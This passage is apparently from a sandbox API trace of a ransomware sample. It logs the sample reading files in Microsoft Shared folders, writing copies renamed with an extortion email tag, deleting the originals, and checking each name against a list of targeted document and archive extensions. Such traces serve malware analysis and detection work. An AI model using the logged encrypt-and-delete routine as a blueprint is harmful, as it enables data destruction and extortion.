lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x430, lpOverlapped=0x0) returned 1 [0035.209] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.209] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe0, lpOverlapped=0x0) returned 1 [0035.209] SetEndOfFile (hFile=0x1bc) returned 1 [0035.210] CloseHandle (hObject=0x1bc) returned 1 [0035.210] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.210] SetEndOfFile (hFile=0x1b8) returned 1 [0035.211] CloseHandle (hObject=0x1b8) returned 1 [0035.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0035.211] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 1 [0035.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.211] lstrlenW (lpString=".doc") returned 4 [0035.212] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0035.212] lstrlenW (lpString=".docx") returned 5 [0035.212] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0035.212] lstrlenW (lpString=".pdf") returned 4 [0035.212] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0035.212] lstrlenW (lpString=".xls") returned 4 [0035.212] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0035.212] lstrlenW (lpString=".xlsx") returned 5 [0035.212] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0035.212] lstrlenW (lpString=".ppt") returned 4 [0035.212] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0035.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.212] lstrlenW (lpString=".zip") returned 4 [0035.212] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0035.212] lstrlenW (lpString=".rar") returned 4 [0035.212] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0035.212] lstrlenW (lpString=".bz2") returned 4 [0035.212] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0035.212] lstrlenW (lpString=".7z") returned 3 [0035.212] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0035.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.212] lstrlenW (lpString=".dbf") returned 4 [0035.212] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0035.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.212] lstrlenW (lpString=".1cd") returned 4 [0035.212] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0035.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.212] lstrlenW (lpString=".jpg") returned 4 [0035.212] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0035.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.213] lstrlenW (lpString=".doc") returned 4 [0035.213] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0035.213] lstrlenW (lpString=".docx") returned 5 [0035.213] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0035.213] lstrlenW (lpString=".pdf") returned 4 [0035.213] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0035.213] lstrlenW (lpString=".xls") returned 4 [0035.213] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0035.213] lstrlenW (lpString=".xlsx") returned 5 [0035.213] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0035.213] lstrlenW (lpString=".ppt") returned 4 [0035.213] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0035.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.213] lstrlenW (lpString=".zip") returned 4 [0035.213] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0035.213] lstrlenW (lpString=".rar") returned 4 [0035.213] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0035.213] lstrlenW (lpString=".bz2") returned 4 [0035.213] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0035.213] lstrlenW (lpString=".7z") returned 3 [0035.213] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0035.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.213] lstrlenW (lpString=".dbf") returned 4 [0035.213] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0035.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.213] lstrlenW (lpString=".1cd") returned 4 [0035.213] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0035.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0035.213] lstrlenW (lpString=".jpg") returned 4 [0035.213] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0035.214] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0035.214] lstrlenW (lpString="MS.PNG") returned 6 [0035.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.214] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1682) returned 1 [0035.214] CloseHandle (hObject=0x1b8) returned 1 [0035.214] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 0x20 [0035.214] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.214] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.214] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0035.215] GetLastError () returned 0x0 [0035.215] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x692, lpOverlapped=0x0) returned 1 [0035.216] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x6a0, lpOverlapped=0x0) returned 1 [0035.217] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.217] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe0, lpOverlapped=0x0) returned 1 [0035.217] SetEndOfFile (hFile=0x1bc) returned 1 [0035.217] CloseHandle (hObject=0x1bc) returned 1 [0035.218] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.218] SetEndOfFile (hFile=0x1b8) returned 1 [0035.219] CloseHandle (hObject=0x1b8) returned 1 [0035.219] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0035.219] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 1 [0035.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.219] lstrlenW (lpString=".doc") returned 4 [0035.219] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0035.219] lstrlenW (lpString=".docx") returned 5 [0035.219] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0035.219] lstrlenW (lpString=".pdf") returned 4 [0035.219] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0035.219] lstrlenW (lpString=".xls") returned 4 [0035.219] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0035.219] lstrlenW (lpString=".xlsx") returned 5 [0035.220] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0035.220] lstrlenW (lpString=".ppt") returned 4 [0035.220] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0035.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.220] lstrlenW (lpString=".zip") returned 4 [0035.220] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0035.220] lstrlenW (lpString=".rar") returned 4 [0035.220] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0035.220] lstrlenW (lpString=".bz2") returned 4 [0035.220] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0035.220] lstrlenW (lpString=".7z") returned 3 [0035.220] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0035.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.220] lstrlenW (lpString=".dbf") returned 4 [0035.220] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0035.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.220] lstrlenW (lpString=".1cd") returned 4 [0035.220] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0035.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.220] lstrlenW (lpString=".jpg") returned 4 [0035.220] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0035.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.220] lstrlenW (lpString=".doc") returned 4 [0035.220] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0035.220] lstrlenW (lpString=".docx") returned 5 [0035.220] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0035.220] lstrlenW (lpString=".pdf") returned 4 [0035.220] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0035.220] lstrlenW (lpString=".xls") returned 4 [0035.220] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0035.220] lstrlenW (lpString=".xlsx") returned 5 [0035.221] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0035.221] lstrlenW (lpString=".ppt") returned 4 [0035.221] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0035.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.221] lstrlenW (lpString=".zip") returned 4 [0035.221] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0035.221] lstrlenW (lpString=".rar") returned 4 [0035.221] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0035.221] lstrlenW (lpString=".bz2") returned 4 [0035.221] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0035.221] lstrlenW (lpString=".7z") returned 3 [0035.221] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0035.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.221] lstrlenW (lpString=".dbf") returned 4 [0035.221] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0035.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.221] lstrlenW (lpString=".1cd") returned 4 [0035.221] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0035.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0035.221] lstrlenW (lpString=".jpg") returned 4 [0035.221] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0035.221] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.221] lstrlenW (lpString="Alphabet.xml") returned 12 [0035.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.492] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=791686) returned 1 [0035.492] CloseHandle (hObject=0x1b4) returned 1 [0035.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0035.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.493] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.493] lstrlenW (lpString=".doc") returned 4 [0035.493] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.493] lstrlenW (lpString=".docx") returned 5 [0035.493] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.493] lstrlenW (lpString=".pdf") returned 4 [0035.493] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.493] lstrlenW (lpString=".xls") returned 4 [0035.493] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.493] lstrlenW (lpString=".xlsx") returned 5 [0035.493] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.493] lstrlenW (lpString=".ppt") returned 4 [0035.493] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.493] lstrlenW (lpString=".zip") returned 4 [0035.493] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.493] lstrlenW (lpString=".rar") returned 4 [0035.493] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.493] lstrlenW (lpString=".bz2") returned 4 [0035.493] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.493] lstrlenW (lpString=".7z") returned 3 [0035.493] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.493] lstrlenW (lpString=".dbf") returned 4 [0035.493] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.494] lstrlenW (lpString=".1cd") returned 4 [0035.494] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.494] lstrlenW (lpString=".jpg") returned 4 [0035.494] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.494] lstrlenW (lpString=".doc") returned 4 [0035.494] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.494] lstrlenW (lpString=".docx") returned 5 [0035.494] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.494] lstrlenW (lpString=".pdf") returned 4 [0035.494] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.494] lstrlenW (lpString=".xls") returned 4 [0035.494] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.494] lstrlenW (lpString=".xlsx") returned 5 [0035.494] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.494] lstrlenW (lpString=".ppt") returned 4 [0035.494] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.494] lstrlenW (lpString=".zip") returned 4 [0035.494] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.494] lstrlenW (lpString=".rar") returned 4 [0035.494] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.494] lstrlenW (lpString=".bz2") returned 4 [0035.494] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.494] lstrlenW (lpString=".7z") returned 3 [0035.494] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.494] lstrlenW (lpString=".dbf") returned 4 [0035.494] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.495] lstrlenW (lpString=".1cd") returned 4 [0035.495] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0035.495] lstrlenW (lpString=".jpg") returned 4 [0035.495] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.495] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.495] lstrlenW (lpString="boxed-join.avi") returned 14 [0035.495] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.923] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=33280) returned 1 [0035.924] CloseHandle (hObject=0x17c) returned 1 [0035.926] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0035.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.928] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.932] lstrlenW (lpString=".doc") returned 4 [0035.932] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.933] lstrlenW (lpString=".docx") returned 5 [0035.934] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0035.935] lstrlenW (lpString=".pdf") returned 4 [0035.935] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.936] lstrlenW (lpString=".xls") returned 4 [0035.936] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.936] lstrlenW (lpString=".xlsx") returned 5 [0035.936] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0035.937] lstrlenW (lpString=".ppt") returned 4 [0035.937] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.938] lstrlenW (lpString=".zip") returned 4 [0035.939] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.939] lstrlenW (lpString=".rar") returned 4 [0035.940] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.940] lstrlenW (lpString=".bz2") returned 4 [0035.940] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.941] lstrlenW (lpString=".7z") returned 3 [0035.943] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.943] lstrlenW (lpString=".dbf") returned 4 [0035.946] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.948] lstrlenW (lpString=".1cd") returned 4 [0035.948] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.949] lstrlenW (lpString=".jpg") returned 4 [0035.949] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.951] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.951] lstrlenW (lpString=".doc") returned 4 [0035.951] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.951] lstrlenW (lpString=".docx") returned 5 [0035.951] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0035.952] lstrlenW (lpString=".pdf") returned 4 [0035.952] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.952] lstrlenW (lpString=".xls") returned 4 [0035.952] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.952] lstrlenW (lpString=".xlsx") returned 5 [0035.952] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0035.952] lstrlenW (lpString=".ppt") returned 4 [0035.952] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.952] lstrlenW (lpString=".zip") returned 4 [0035.952] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.952] lstrlenW (lpString=".rar") returned 4 [0035.952] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.952] lstrlenW (lpString=".bz2") returned 4 [0035.952] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.952] lstrlenW (lpString=".7z") returned 3 [0035.952] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.952] lstrlenW (lpString=".dbf") returned 4 [0035.952] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.952] lstrlenW (lpString=".1cd") returned 4 [0035.952] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0035.952] lstrlenW (lpString=".jpg") returned 4 [0035.952] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.952] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.952] lstrlenW (lpString="ipsnld.xml") returned 10 [0035.953] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0036.701] GetFileSizeEx (in: 